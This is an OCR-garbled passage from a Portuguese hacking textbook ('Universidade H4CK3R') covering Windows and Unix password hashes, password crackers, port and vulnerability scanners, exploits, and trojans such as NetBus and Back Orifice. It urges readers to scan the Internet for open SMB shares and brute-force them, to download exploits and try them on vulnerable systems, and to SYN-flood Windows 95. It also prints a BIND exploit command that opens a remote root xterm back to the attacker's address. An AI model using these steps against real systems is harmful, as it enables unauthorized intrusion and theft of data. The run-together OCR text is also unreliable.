maedinah:1001:3592C2B9967FD3A4976EED543AC98756C3C3CFA2:8903
AD475E3478C45D15B1749777DCFD3CC4457:::
oprimeirocampoé,obviamente,ologindousuário.OsegundoéoIDúnico
dousuárionosistema.SistemasdafamíliaWinNTpossuemtalidentificaçãoda
mesmaformaquenosUnix,emboraissosejaescondidodosusuários.Depois
temosdoisgrandesnúmeros,querepresentamassenhascriptografadasdosis-
tema.AprimeiraéarepresentaçãodasenhapararedesMicrosoftantigas,com-
patíveiscomLANManager.Porissomesmo,échamadadeLMHash.Naverda-
de,neméasenhaqueécriptografada.Docontrário,osistemageradoisnúme-
roshexadecimais,eessesnúmerossãocriptografadospelopadrãoDES(Data
EncryptionStandard),usandocomochaveasenha,ajustadapara14caracteres
(casoousuáriotenhaescolhidoumasenhamenor,sãoaplicadosenchimentos).
Cadametadedasenha(setecaracteres)éusadaparacriptografarumdosnú-
meroshexadecimais.Essarepresentaçãodasenhaémuitofracaeéfacilmente
decodificávelporhackers.Ométodonormalmenteutilizadoéadivisãodohash
emduaspartes,eohackerusapasswordcrackersindependentesemcada
pedaço,acelerandoaquebradasenha.
AseguinteéachamadarepresentaçãoNTdasenha.Aocontráriodaanterior,
essarepresentaçãoémuitomaisdificildedecifrar.Asenhaé,também,ajustada
para14caracteresedepoiscriptografadatrêsvezescomoalgoritmodehashing
MD-4.Apesardemuitomelhor,aindaéineficientesecomparadoaossistemas
Unix.Falta"sal".Oconceitode"salting"(ou"salgar")éinteressante.Qualquer
algoritmodecriptografiabaseia-senapermutadevalores.Temperarohashing
comsaltsignificaescolheraleatoriamentemuitosdosvaloresparapermuta,adi-
cionandoumanovacamadadedesafioparaareversãodocriptograma.Afaltade
"tempero"permiteaocrackerusarapenasumaestimativadehashingparaa
senha,diminuindoconsideravelmenteotemponecessárioparadescobri-Ia.
Mesmosemesseproblema,oWindowsNT/2k/XPpossuioutroinconveniente
gritante:oshashessãolegíveisporqualquerusuário.Nãohácomoprevenirque
crackerstenhamacessoaeles.Alémdisso,namaioriadoscasos,amesmasenha
blindadapelohashNTestáfracamentedissolvidanopseudo-hashLM.Desco-
11391
]VulnerabilidadesI

IUniversidadeH4CK3R I
brindoosegundo,éprovávelqueocrackertenhaacessoaosistemaeàrede.
NoUnix,asinformaçõesdeloginsãoarmazenadasnoarquivo/etc/passwd.
Oconteúdodoarquivopasswdémuitomaiscomplexo(ecompleto)queoseu
equivalentemicrosoftiano.
nonodeogum:
$1$YgQ8Da9T$WFS59jmV80kWAia2cjr8u1: 500:500:Pai
NonodeOgum:/home/nonodeogum:!bin!bash
Daesquerdaparaadireita,separadospordoispontos,temos:nomedelogin,
hashdasenha,IDdousuário,IDdogrupoaqueelepertence(tantonoWinNT
quantonoUnixosusuáriossãoorganizadosemgrupos),nomecompletodo
usuário(esteéoantigoG-COSfield),localizaçãododiretóriopessoal(home)
dousuárioeshelldelogin.Observeohash.Émuitomaiscomplexoqueodo
WinNT.Nãohácomoohackerdescriptografarasenhaporqueelaé"sódeida".
Achavedecriptografiaéaplicadaquandoousuáriocadastraasenha,ficandoo
resultadodohashingguardadonoarquivopasswd.Achave,sendode"mãoúni-
ca",sópodeserdescobertaporbruteforce.QuandoousuárioIoga-senosiste-
ma,asenhadoarquivopasswdnãoédecifrada.Aocontrário,asenhaqueele
forneceduranteologinécriptografadanovamenteecomparadacomaque
estágravadanoarquivo.Seambas"baterem",ousuáriotemacessoaosistema.
Umadascaracterísticasinteressanteséquenenhumalgoritmodecriptografia
geraumhashquecontenhaocaractere"*".Porissomesmo,colocarum
caracteredessesnolugardasenhaimpedeologinporaquelaconta.
Aabordagem/etc/passwdtemumproblema.Todososusuáriosdevempo-
derlerdoarquivo,poissuasinformaçõesvitais(UlD,GID,homeeshell)estão
nele.Issoquerdizerqueoshashesdetodososusuáriosficamdesprotegidose
qualquerlammercomumacontanosistemapodequererrodarumquebrador
desenhasneles.Mesmosendodifícildequebrar,umarquivoquepodeserlido
portodomundotambémpodesercopiadoemdisquete,levadoparacasae
quebradosossegadamenteporumamáquinacomum,semqueninguémsaiba.
Pararesolveresseproblema,amaioriadosUnicesdehojeutilizao
sombreamentodesenhasoushadowpasswords.Oshadowéumarquivocom
permissãodeleituraapenasparaoroot.No/etc/passwd,nolugardasenha,
temosum "*,,ou"x"paraindicarqueasenhaestánoarquivoshadow.Estatécni-
casozinhatornaimpossívelconseguir,comousuárionormal,assenhasdeou-
trosusuários.E,comosabemos,namaioriadosataquestemosdeconseguir
acessorestritoprimeiroparadepoistentaracessoirrestrito.Umúnicoexpedi-
entecolocadoisníveisdedificuldadeamaisnocaminhodocracker.
OquebradordesenhamaisconhecidoparaafamíliaWinNTéoLOphtCrack,
umaferramentadeusomuitofácilecapazdequebrarosfracoshashesdo
Windowsempoucotempo.Atualmenteestádisponívelapenasemversãoco-
mercialcustandoUS$350,maspode-seconseguirocódigo-fontedeumaver-
140I
VulnerabilidadesI[

Universidade1°ano
sãomaisantiganoendereçowww.atstake.com/research/1c/download.html.Para
Unix,avedeteéofabulosoJoOOtheRipper.Osoftwareécapazdequebrar,com
algumaajudadaengenhariasocial,assenhasdosarquivospasswdeshadow(se
ocrackerconseguiracessoaeles)e,emconjunçãocomferramentasde
conectividade,podecapturarsenhascriptografadasquetrafegamemumarede.
AlémdeUnix,háversõesdoprogramaparaDOS,Win32,BeOSeOpenVMSe
checagemdeKerberosAFSepseudo-hashesLMdoWindowsNT!2k!XP.OJoOO
theRipperestádisponívelemwww.openwall.com/joOO/.
OleitordeveternotadoquenãomencionamosafamíliaWin9xnestaseção
sobresenhas.Omotivobemsimples:nãohásegurançanesseambiente.As
senhassãogravadasemarquivoscomonomedousuárioeaextensãoPWL.
Deveserrelativamentefácilquebrarassenhasembaralhadasnessesarquivos
(recusamo-nosausarapalavra"criptografadas"aqui),masnãohánecessida-
dedetanto:bastaapagarosarquivoseoWindowsalegrementepedenovas
senhas...Entretanto,comoosarquivosPWLpodemguardar(enormalmenteo
fazem)amesmasenhadarede.quebrá-Iospodeserbemútil!Hámilharesde
quebradoresdePELnopacketstormsecurity.nl.
Scanners
Scannerssãoprogramasutilizadosparavarreroscomputadoresemumarede
àprocuradevulnerabilidades.Háportasabertasaataquestantoemmáquinas
pessoaisquantoemservidoresdetodosostamanhos.Osscannersbuscamsiste-
masqueestejamdesprotegidoseprontosparareceberumaanáliseminuciosa
sobresuasegurança.Amaioriadosscannersnãofoidesenvolvidacomintenção
deusomaligno.Mascomoarosabonitaeperfumadatambémpossuiespinhos,
sãoutilizadospelosdoislados:oshackersosutilizamparaoataque,enquantoos
administradoresprocuramasbrechasparafazerasdevidascorreções.
Existemscannersespecíficos,desenvolvidosporempresas,quedãoênfaseà
segurançaequegeralmentecustamcaro.Comoumcrackernãorespeitanada,
fatalmentetaisscannerscairãoemsuasmãos.Outrossãocriadosporhackers
maisexperientes.Enquantoavulnerabilidadequeessesscannersexploramfor
segredodeclãs,poucosterãoacessoaeles.Depoisqueficamobsoletos,são
postosnaredeparaqueosscriptkiddiespossamfazeruso.Porisso,ébom
lembrarquescannersencontradosfacilmentenaInternetpodemnãosermais
tãoeficientesousãomesmocompletamenteinúteis.
Podemosdividirosscannersemdoistipos:oscannerdeportasTCPjIPaber-
tas(ouportscanner)eoscannerdevulnerabilidadesconhecidas.
Portscanners
TodamáquinacomconectividadeTCPjIPpossui,emteoria,maisde128mil
pontosvulneráveis.Cadaserviçoderedequeestiverdisponívelemumadeter-
minadamáquinaéumaportadeentradaempotencial-comovimosnocapítu-
11411
]VulnerabilidadesI

IUniversidadeH4CK3R ,
10sobreUnix.EmRedesI,aprendemosquecadaumdessesserviços"escuta"a
redepormeiodeumaportarepresentadaporumnúmero,àesperadecone-
xões.Comosão65.536portasparaoprotocoloTDPe65.536portasparao
protocoloUDp,temosaíumaverdadeiralegiãodehidras.Porexemplo,sea
máquinaforumservidorWeb,ébemprovávelqueaportaTCP80estejaaberta,
paraqueoutroscomputadorespossamacessaraspáginasHTML.Outroexem-
plo:umamáquinaWindowsqueestejacomocompartilhamento("share")de
arquivosligado"escuta"asportas137,139e455àesperadeoutrasmáquinas
Windowsquequeiramlerosarquivoscompartilhados.Essesnúmerosestão
normatizadosnaRFC17004.
OsportscannersverificamasportasTCP/lPabertasdeumsistema.Seuobjetivo
élistarosserviçosderedeTCP/lPdisponíveis,fazendocomquerespondamquan-
doconsultados.Comosresultadosfornecidospeloportscannereoconhecimento
daRFC1700,ohackerpodedeterminarquaisserviçosestãodandosopaeaplicar
nelesosexploitspertinentes.Existemtambémosstealthportscanners,queutili-
zamtécnicasdenão-conexãoouconexãoincompletaparanãoseremdetectados
-
nemsemprecomsucesso-comosetivessemumsistemadecamuflagem.Osadmi-
nistradorestêmdeutilizarferramentasespecíficasparadetectá-los.
Quasetodasastécnicasdeportscanningvalem-sedossinais(ouflags)TCp,
UDPouICMPtrocadosentreosprogramasquequeremseconectar.Apenas
parareferênciarápida,ossinaissãoestes:
PSH(push)-Umtipode"válvuladedescarga",aceleraatransmissãoparapoderfinalizá-Ia
SYN(synchronize)
-Tentativadesincronizaçãoentreportas
ACK(acknowledge)-Indicaqueospacotesanterioresforamaceitosnodestino
RST(reset)
-Interrompeaconexão,devidoaerrosou"quedadelinha"
FIN(finish)-Finalizadordeconexão,usadonofimdatransmissão(nãohámaisdados)
URG(urgent)
-Sinalizadordeurgênda
Apartirdaanálisedessessinais,osscannersretiraminformaçõesúteissobre
ossistemaseoscomparamcompadrõespredefinidos.Oresultadodissoé
passadoparaohacker,queinterpretaosresultadosbaseadoemsuaexperi-
ênciaeconhecimentoedecidequaisexploitsusar.Escovaremosmaisbits
sobrehadshakeTCP/lPefuncionamentodescannersnoscapítulosseguintes.
Setudoatéaquilhepareceuconfuso,nãoprossiga.ReleiaocapítuloRedesI,
ealgunsdostutoriaissobreTCP/lPincluídosnoCD.Recomendamosaindaos
excelenteslivrosdeAndrewTannembaumedoProf.GabrielTorres,Redesde
Computadores.Apesardomesmonome,sãodoislivrosdiferentes.AInternet
tambémestácheiadetutoriaissobreTCP/lP.Useseumecanismodebuscafavo-
ritoedivirta-se!
4RequestforCommentssãodocumentoscomrecomendaçõesparaimplementaçãodeserviçose
normasparaaInterneteredesemgeral.Todoselespodemserconsultadosemwww.ietforv./rfc.html.
1142 1
Vulnerabilidades Ir

Universidade1°ano
Funcionamentodeumscannerdeportas
ExistemcentenasdescannersdeportasespalhadospelaInternet.Emprimei-
rolugar,devemosescolheraplataformanaqualvamostrabalhar,Unix(incluin-
doaíLinux)ouWindows.Grandepartedosiniciantesprefereasegundaopção,
poisamaioriadasferramentassãomaisfáceisdetrabalhar.Depoisde"brincar"
umpoucocomessesscannerseverificarseumodusoperandi,podemospassar
ausarscannersmaiscomplexosepoderosos.
Umadasopçõesdosbonsprogramasdescanéapossibilidadededefinirumrangeou
faixadeIPsaseremverificados.Porexemplo,poderíamosvarrerosendereçosentre
192.168.1.1e192.168.1.10-dezmáquinasemumaredeprivada-ouentre64.x.x.le
64.y.y.254-252máquinasnaInternetpública.Observequeemqualquerfaixadeende-
reçopoderemosencontrarcomputadorespessoais,estaçõesdetrabalhoouservidores.
Omitimosx.xey.ydosendereçosdoexemploparaprotegerosinocentes.;-)
LembrandoqueIPsinternoscomoosdegrandesempresasnãopodemser
atacadosdiretamentepelaInternet.Serianecessáriopassarprimeiropelo
gateway,pelofirewall,conseguirumshellemalgumamáquinaquepossua
interfacesderedetantonaInternetquantonaredeinternaemapeararede
internaatéchegaràmáquinadesejada
-oquenãoénadafácil,porenquanto...
NocasodeumendereçodiretamenteconectadoàInternet,énecessáriofa-
zerumaescolhadasportasmaiscomumentevulneráveis.Apósdefinirorange
dosIPs,podemos,aonossogosto,definirquaisportasvamostestarequais
métodosusaremosnelas.Restringironúmerodeportaséumaatitudesábia,
pois,sevocêescanearTODASasportas,seguramenteserádetectadoporum
administradoratento(ouumIDS).Comececomosserviçosmaiscomuns,nos
quaisvocêpodeserconfundidocomotráfegonormal.Nossassugestõessãoas
conhecidasportas21(Telnet),25(Mail),53(DNS),80(Web)e139/445(SMB/
CIFS).Parafinsdidáticos,consideremosescanearasportas.Depoisdeconfigu-
rado,bastacolocaroprogramapararodareveremososeguinteresultado:
Address:192.168.1.12
Port21...Listening
Port22...Listening
Port25...Listening
Port110...Listening
Asportas21,22,25e110podemestarabertasparaumapossívelinvasão,
podemestarsobavigilânciadeumadministradorepodemrealmentesersegu-
ras.Aporta110ofereceoserviçoPOP3.Éporondevocêseconectapara
baixarseuse-mails.Ora,essaportaTEMdeestaraberta(nosservidoresdee-
mail,obviamente),deoutraformaninguémpoderialercorrespondênciaeletrô-
nica.Portasabertasnãosãosinônimodeinsegurança.Oproblemasãoasportas
aberta,cujosprogramasqueas"escutam"possuemfalhasdesegurança.
11431
IVulnerabilidadesI

IUniversidadeH4CK3RI
oportscannermaisconhecidodafacedaterraéonmap(www.insecure.org/
nmapf).DesenvolvidooriginalmenteparaUnix,possuiversõesparamuitos
sistemasoperacionais,incluindooWindows.Concebidoparaalinhadeco-
mando,possuidiversosfrontendsgráficos,comooNmapWinparaWindows
(www.nmapwin.org)eonmapfeparaUnix(inclusonopacotedonmap).Ex-
tremamenteflexívelepoderoso,onmapeváriosdeseusfrontendspara
Windows,UnixeMacestãoincluídosnoCD.
Scannerdevulnerabilidade
Nósutilizamososportscansparaverificarosserviçosativosemumdadosiste-
ma.Umavezdeterminadosessesserviços,entraemcenaumoutrotipode
scanner:odevulnerabilidades.Basicamente,aidéiadoscannerdevulnerabilidade
é,atravésdeumalistadefalhasconhecidas,checarseosistemaestáounão
executandoumserviçocomproblemas.Estesscannersfacilitamsobremaneira
otrabalhodoinvasor,automatizandooprocessodeconexãoacadaumdos
serviçoslistadospeloportscaneaverificaçãodefraquezas.Sendoautomático,
poupaaoinvasordiasdetrabalho,poispodechecarsozinhodezenasoumesmo
centenasdevulnerabilidadessemaintervençãodoblack-hat.
Umbomscannerdevulnerabilidadedeveverificarosseguintesitens:
~Erroscomunsdeconfiguração:administradoresdesistemainaptose
usuáriosleigosdeixam,porincompetência,váriasportasabertasefraquezas
desprotegidasemseussistemas.
~Configuraçõesesenhas-padrão:nãohánadadequeumhackergoste
maisdoqueumadministradordesistemasqueinstalasoftwareseosdeixa
comasconfiguraçõesdefábrica.Ri-sedebabaraoperceberservidorescom
usuáriosesenhas-padrão(dotipousuário:rootsenha:rootouusuário:admin
senha:master)oucomdiversosserviçosinsegurosdesnecessariamenteativados.
~Combinaçõesóbviasdeusuárioesenha:outroproblemasãoassenhas
óbvias.Usuárioscomunsjápossuematendênciadecolocarumasenhafácilde
lembrar(onomedaesposa,porexemplo).Asituaçãopioraquandousamcom-
binaçõesdenomesnotoriamentepúblicos.Exemplosdeparesusuário/senha
fracos:fabio/junior,wanderley!luxemburgo,alice/cooper,carla/perez,george/
walkerbush.Outroproblemasãosenhasdepalavrasdodicionário:há
quebradoresdesenhacomlistasdepalavrascomuns.Umestudofeitoem1998
porumaempresanorte-americanamostrouque82%dosfuncionáriosutiliza-
vam,comosenha,algumaposiçãosexualouonomedochefemodificadode
formapejorativa.
~Vulnerabilidadesdivulgadas:semprequeumafalhadesegurançaé
divulgada,háumacorridadosdesenvolvedoresdesoftwareparasaná-Ias.Mas
tambémháumaoutracompetição:adoshackersquequeremchegaraossiste-
masvulneráveisantesdeseremconsertados.
Umscannerdevulnerabilidadespode,porexemplo,descobrirquesuaversão
11441
VulnerabilidadesI[

Universidade1°ano
doservidordeSMTPsendmailémuitoantigaepossuiofamososendmail-bug.
OuquevocêaindaestáusandooMSNMessenger4.6e,portanto,emprega
controlesActiveXvulneráveis.Ambassãofalhasmuitoantigas,mas
-quemse
importa?-sevocênãodeuatençãoaosconselhosdeseugurudesegurança
favoritoenãoatualizouseussistemas,oproblemaétodoseu.Essessãoapenas
doisexemplosdascentenasdetestesqueumúnicoscannerdevulnerabilidades
podefazerporvocê.Scannersmaismodernosjáincluem,emummesmo
software,portscans,vulnscansemapeamentoderedes.Umexemplodissoéo
excelenteNessus(www.nessus.org).queseráabordadonoscapítulosfinais.
Exploits
Exploitssãoscriptseprogramasdesignadosparaexploraçãode
vulnerabilidadesemsistemas.Assimcomoosscanners,elespodemserusados
tantoporadministradoresparatestarasfalhasdesegurançaemseusservidores
quantopeloshackersqueosutilizamparainvasãoeaquisiçãodeinformações.
Háváriostiposdeexploitsecadaumpossuiumaformadiversadeaplicação.
ParaalgunsdelesohackerprecisateracessoaoShelldamáquina-alvo.Isso
podeserconseguidopormeiodeumcavalodetróiaexecutadopelavítimaem
seusistema.Taltrojanabreumaportadecomunicação(sim,umaportaTCP/lP,
comnúmerodeterminadoeumprotocolo)epermitequeoinvasortenhatotal
controlesobreamáquina,oqueincluiinstalaçãodeprogramase,portanto,a
aplicaçãodequalquerexploit.Noteque,nestecaso,jáhouveumapequena
invasão:oexploitpermitequebraroutrosníveisdesegurançae,assim,obterum
acessomaisprofundo.
Outrosexploitsservemjustamenteparaconseguiroacessoaumshellepo-
demseraplicadosatravésdeumsitequecontenhaumcódigomaliciosoescon-
dido.E-mailsemformatoHTMLtambémsãovetoresdessetipodecódigo.Nor-
malmente,oqueessesexploitsfazemégerarumestourodepilha(buffer
overflow)e,comisso,confundiramáquina-alvo,fazendo-aabortaroprogra-
maemexecuçãoedevolverumalinhadecomando.E,porora,bastasaberque
todososprogramaspossuemumaáreadememória(oubuffer)paratrocar
dadoscomoutrosprogramasouparainteragircomousuário.Essaáreade
memóriatemumtamanholimitado,eprogramasmalescritoscomportam-se
deformaestranhatodavezqueobufferficacheio.Opróximodadoque
tentarentrarnobufferenãoconseguirgeraráinstabilidadesnoprogramae
poderáparalisá-Io.
Umexemploprático:descobre-senoendereçovitima.com.br(atençãolammers:
oendereçoéfictício)umsistemaUnixrodandoumaversãovulneráveldoBIND,
umservidordeDNS.UmexploitparaessaversãodeBINDchamadobindxplté
encontradonositeRootshell,quepermiteaexecuçãodecomandosarbitrários
pelodaemonnocaractereseguinteaoúltimoquecabianobuffer.Lembrandoque
elesórodacomprivilégiosderoot,executa-se,namáquinadohacker,ocomando:
11451
1VulnerabilidadesI

IUniversidadeH4CK3R I
$bindxpltvitima.com.br u/usr/XIIR6/bin/xterm -display
200.xxx.yyy.6:0u
Comopormágica,umajaneladeX-Terminalseabrenamáquinadohacker,
quepossuioIP200.xxx.yyy.6.Dentrodessajanela,opromptderootdamáqui-
navitima.com.br.Éaglória!
Hámilharesdeexploitsquepodemserutilizados.Poderíamoscitaralguns
aqui,masaquantidadeérealmenteassustadora.Sugerimospararaleiturado
livronestepontoenavegarporcadaumdossitescitadosabaixo.Tomeconhe-
cimentodecomocadasitefunciona,baixealgunsexploitsdecadaumetente
aplicá-Iosemsistemasvulneráveis.
www.cert.org
www.insecure.org
www.rootshell.com
www.securityfocus.com
www.packetstormsecurity.org
www.linuxsecurity.com
www.linuxsecurity.com.br
www.hackersplayground.org
www.ntsecurity.nu
www.antionline.com
www.digitalsin.net/cyn/sinfinite
www.cexx.org
www.hackinthebox.org
astalavista.box.sk
EmTróia,comoosgregos...
Umavezcomacessoàlinhadecomandonamáquinainvadida,umadaspri-
meirasprovidênciasdoblack-hatéinstalarumbackdoor.Pormeiodele,ohacker
podeentraresairdocomputadorinvadidosemprequequiser.Masparainstalar
atalportadetrás,amáquinaprecisaserprimeiroinvadida.Muitosachamque
issodátrabalhodemais.
Algunsespertospensaram:porquenãofazerospróprioslosersfacilitaremo
nossotrabalho?Bem,vocêjátemochãofértilparaonascimentodosprimeiros
cavalosdetróia.Ostrojans,comosãocomumentechamados,sãoprogramas
executáveisquecontrolamtodasaspartesdocomputadorecomunicam-secom
omundoexterior.Umhackerconecta-seaotrojanpormeiodeumbackdoor
embutidoepodecontrolaradistânciaamáquinainvadida.Em1998,maisde250
tiposdetrojansconhecidosjáestavamatuandonosmicrosdosmaisdesavisados,
edesdeentão,essenúmerocresceumonstruosamente,chegandoa580em2000.
Hojeemdia,toma-sedifícilencontrarumnúmerofiel,emesmoosnúmeros
apresentadosindicamapenasostrojansencontradosecatalogados.Muitosain-
dadevemandarporaícomtrojanstãoantigosquantoindetectáveis...
146I
VulnerabilidadesI[

Universidade1°ano
Adifusãodessetipodeprogramadá-seporcontágio.Ostrojans,emsuamaioria,
sãodesenvolvidosedistribuídoscomovírus,anexadosemmensagensdee-mail
ouemdisquetespromíscuos,emuitasvezessãoescondidosemarquivosino-
centes,comoimagens,apresentaçõesemFlashejoguinhos.Depoisqueapró-
priavítimainstalouotrojan,ocomputadorinfectadocomeçaafuncionarcomo
umservidor.Seháumservidor,háumclienteparaseconectar,queestáem
poderdohacker.Aconexãoépraticamenteimperceptívelparaousuárioleigo,
que,aoseconectaràInternet,estásujeitoaoataque.
DoisdostrojansmaispráticosdaatualidadesãooNetbuseoBackOrifice.
Ambosocupampoucoespaçoemdisco(oBOtemapenas120KB)epodem
passardespercebidos,poisháapossibilidadedecamuflaroexecutávelescon-
dendo-oemoutroprogramaouarquivo.Apósainstalação,otrojanapagaseus
rastrosetorna-seativo,aguardandoapenasquealguémseconecteaocomputa-
dorinfectado.Comoqualqueroutrotrojan,oBOeoNetbussãoconstituídosde
doisarquivos:oclienteeoservidor.Umdosprincipaisproblemasdeambosé
queosservidoresestãorestritosàfamíliaWindows9.x,emboraexistamclientes
BOparaWindowseUnix.
Entreasfunçõescomunsaambos,podemosdestacar:
~Fornecerumshellparaoclientecomacessoirrestrito;
~Controlartodososdispositivosdehardwaredamáquina;
~Gravarumaimagemdateladocomputadorinvadido;
~Fazerexamesdarede,podendoobtersenhaseoutrasinformações;
~Gravarumarquivocontendoinformaçõessobretudoquefoitecladonomicro;
~PossibilitaraaberturadejanelasDOSremotamente.
OBOeoNetbussãodoistrojansmuitovisados.Todososantivírusconside-
ram-noscomoameaçaeimpedemquesejaminstaladosnocomputador-desti-
no.Aliás,umbomprogramaantivtrUsbarramaisde90%dostrojansconheci-
dos.Obviamentehámuitosoutrosporaíquenuncaconhecerãooutromestre
alémdeseucriadore,portanto,serãoimunesàmaioriadosantivírus.Todo
cuidadonessescasosépouco.
AmbosestãoincluídosnoCD,erecomendamosquenossaredesimples(La-
boratóriodeRedesI)sejausadaparatestá-Ios.Leiaadocumentaçãodeambos,
familiarize-secomelesetentecontrolaroutrasmáquinas.
Acriaçãodebonsscannerseexploitsdemandaconhecimentosemprograma-
çãoeTCP/IP.Paraconsegui-Ios,aanálisedecódigosalheioséumbompontode
partida.NosCDs,hádiversosexemplosemcódigo-fontedescanners,exploits
ecavalosdetróia.DessenferrujeseusconhecimentosemDelphy/Kylix,PerIou
C/C++eváemfrente.Noperíododedoisoutrêsmesesserápossívelescrever
seupróprioscanneremsualinguagemfavorita.
11471
]VulnerabilidadesI

IUniversidadeH4CK3RI
Asfalhasdesegurançamaiscomunsem
microsdomésticos
Apesardenãoseroalvopreferidodoshackers,osmicrosdomésticossão
ótimoscomoáreadetreinoparaaquelesquequeremadentrarnouniversodas
invasões.Geralmente,osusuáriosdomésticosutilizamalgumaversãodosistema
operacionalWmdows,umaverdadeiraorgiadefalhasparaaplicarexploitsetes-
tartrojans.Mesmoosusuáriosdeoutrossistemaspessoais,comolinux,FreeBSD
ouMacOS(edoWmdows2000,queérelativamentesegurosecomparadoao98),
nãoescapamdessestiposdeataque,poisnemsempredominamtotalmenteas
característicaseopçõesdesegurançaqueessessistemasoperacionaisoferecem.
Apresentaremosaquiapenasalgumasdelas.HámuitosexploitsnosCDsque
podemedevemserexperimentados,easnovidadesemtermosdefalhassaem
fresquinhasdiariamentenossitesespecializados.Paraummelhorestudo,éinteres-
santeprepararumamáquinaparaser"cobaia"eligá-Iaemredecomsuaestaçãode
trabalho,deondeosataquesserãooriginados.Instalediversossistemasoperacionais
(Win98/Me/2k/XP,linuxeFreeBSD-umporvezoutodosemmulti-boot,aseu
gosto)emandebrasa!Notequealgumasfalhasnemprecisamdeexploits...
TCPSYNScanningversusWindows 95
UmafalhagritantepresentenoWindows95(masaparentementenãono98
nemnoMe)éaincapacidadedelidarcompacotesSYN.Comoveremosnocapí-
tuloRedes11,numaconexãoTCP/lPdeverdadehátrêshadshakesbásicos.Quem
pedeaconexãomandaumpacoteSYN,quemaceitaaconexãomandaumSYN/
ACKeficaesperandoumpacoteACKdosistemaquesolicitouaconexão.
UmportscantipoTCPSYNnuncaenviaráopacoteACKemrespostaaSYN/
ACKdoWindows.IssofarácomqueoWindows95congeleporalgunsinstan-
tesenquantoesperaopacote.Casosejafeitoumflood(enviodeumgrande
númerodepacotessimultâneos)SYN,apilhaTCP/lPdoWindowstravaeé
apresentadaafamosa"TelaAzuldaMorte"(BlueScreenofDeathouBSoD).
Experimentefazê-Iocomonrnap/nrnapWinemsuamáquinadetrabalho,apontan-
doparaoIPdamáquina"cobaia"erodandooscancomaopçãoSYNStealthligada.
CompartilhamentosemcomputadoresWindows
(SMB/CIFS)
AconfiguraçãoincorretadoprotocoloconhecidocomoCommonInternetFile
System(CIFS-anteriormenteconhecidocomo5MBouServerMessageBlocks),
quepermiteocompartilhamentodearquivosatravésderedes,podeexporarqui-
voscríticosdosistemaouatémesmopermitiracessocompletodosistema.
148 I
VulnerabilidadesI[

Universidade1°ano
Usuárioscorporativoscostumamcompartilharseussistemasdearquivosem
suarede.Ingênuos,ativamessaopçãotambémemcasa,esquecendo-sedeque
estãodiretamenteconectadosàInternet.Comisso,abremasportasparaque
oshackersfaçamoquebemquiseremcomseusarquivos.Umaconexãodeno-
minada"nullsession"(semusuárioesenha)podepôremriscoinformações
pertinentesaosistemaechavesderegistro.
Scannersdevulnerabilidades(comoojácitadoNessus)normalmenteprocu-
rampordiversasportas,incluindoasportas135(TCPeUDP),137(UDP),138
(UDP),139(TCP)e445(TCPeUDP).Casopelomenosduasdestasportas
estejam(ouaparentemestar)ativas,ocomputadorapresenta-sevulnerávelà
conexãoporcompartilhamento.
Oprocedimentoébemsimples.Primeiro,useoNessusparaprocurar,na
Internet,máquinascomessasportasabertas.Anotetodasqueencontrar.No
Windows,chameoInternetExplorerecoloqueonúmeroIPdamáquinavulne-
rável,noformatoLANManager:\IP.DA.VÍTIMA.AQUI.Senãohouversenha,os
compartilhamentosserãomostrados
-bastac1icarneles.Casohaja,umbom
quebradordesenhasporbruteforcedarácontadorecado.
J171:3
~!iona:;'
CasoestejaemumamáquinaLinux,podem-seusaroscomandosdopacote
samba-c1ientsparatentaraconexão,daseguinteforma:
$smbclient-LIP.DA.VÍTIMA.AQUI
Provavelmenteserãopedidassenhasparamostraroscompartilhamentos.No-
vamentedeve-serecorreraosquebradoresbruteforceparadescobrirassenhas.
11491
IVulnerabilidadesI

IUniversidadeH4CK3R I
SeainterfacegráficaKDE3estiverdisponível,pode-seusaroKonqueror.Escre-
vanabarradeendereçosoIPdavítimadaseguinteforma:smb://
IP.DA.VÍTIMA.AQUI/.OScompartilhamentosdevemserexibidos.
Umacuriosidadesobreesse
furodesegurançaéqueoriginal-
menteelenãoexistia!OProtoco-
loNetBEUI(antecessordo5MB/
CIFS)permitiaocompar-
tilhamentodearquivosnasredes
LANManager,Windowsfor
Workgroupsenosprimeiros
WmdowsNT.SóqueoNetBEUI
nãoeraroteávele,portanto,era
impossívelquegrandesredesIP
tivessemconectividadetotalpor
meiodele.Pararesolverisso,a
Microsoftestendeuaimp1e-
mentaçãodoNetBEUI.Batizada
de5MB,anovatecnologiaper-
mitiao"empacotamento"dos
pacotesNetBEUInoprotocolo
TCP/IP.Aconexãoentreasmáquinaserafeitapelasportas137e139.
Entretanto,"tunelar"oNetBEUIpeloIPpermitiaqueopacotefosseroteável
nãosópelaredecorporativamastambémpelaInternet.Nessescasos,háduas
opçõesparaasempresas:isolarcompletamentearedeinternadaInternetou
nãocompartilharnada,nunca.Jáosusuáriosdomésticosnormalmentenãotêm
oquecompartilhar(poisnãopertencemaredealguma)edevemmanteresse
recursodesligado.
IJiJIIilIiI
li!

I/ocêjUeasafornece!
umusuãrioeuma
I!I!n".
,1713iR<>bet1!
f\Íume
dI>1tW<\1iU:
[mbert<>
Senha;
Serviçosdesnecessariamenteligados
oUnixnuncafoipensadoparaserumsistemaoperacionaldoméstico.Costu-
ma-sedizerqueelefoicriado"porprogramadores,paraprogramadores".De-
pois,foiadotadocomosistemaoperacionalidealparaservidorese,paraisso,foi
recheadocomdiversosprogramaseserviçosespecíficosdeservidor.
Atualmente,oLinuxeoFreeBSDestãosendousadosnumaescalamaiorcomo
SOsemestaçõesdetrabalhoemicrosdomésticos.Masaindaassimsãoprepa-
radosparaserservidores,umavezqueamaioriadasdistribuidorasmontasuas
caixinhascomprodutos"polivalentes"emvezdeespecializados.Umusuário
domésticotalveznuncaprecisedeumsendmailouumapacherodandoemsua
máquina,masaindaassimostem.
Ointeressanteéqueneméprecisoexplorarfalhasdesoftwarecomoestou-
150
I
VulnerabilidadesIr

Universidade1°ano
rodepilhaouprogramascomunscompoderesderoot.Imagineumaestação
detrabalhoLinuxcomosserviçosdeFinger,FTPeTelnethabilitados.Ousuário
nãoprecisadeles-porqueamáquinadeleneméumservidor-esequersabe
queosserviçosestãoativados.Comocomandofmger,umhackerobtémalista
deusuárioscadastradosnosistema.Depossedosnomesdeloginporbrute
forceoudicionários,consegueentraremumacontadeTelnete,umavezden-
tro,podeexplorarosistemaàvontade.
Acorreçãoparaestafalhaésimples:desliguetudooquenãoforusar.
BufferOverfLownosserviçosdeRemoteProcedureCaLL
AindasobreUnix,algunsserviçosutilizam-sedasRPCs,quesão,simplificando
aexplicação,comosefossesyscallsexecutadasemoutrocomputador.Por
exemplo,umamáquinaUnixutiliza-sedoRPCparaaplicaroserviçodeNetwork
FileSystem(NFS)oferecidoporoutramáquinaUnix.
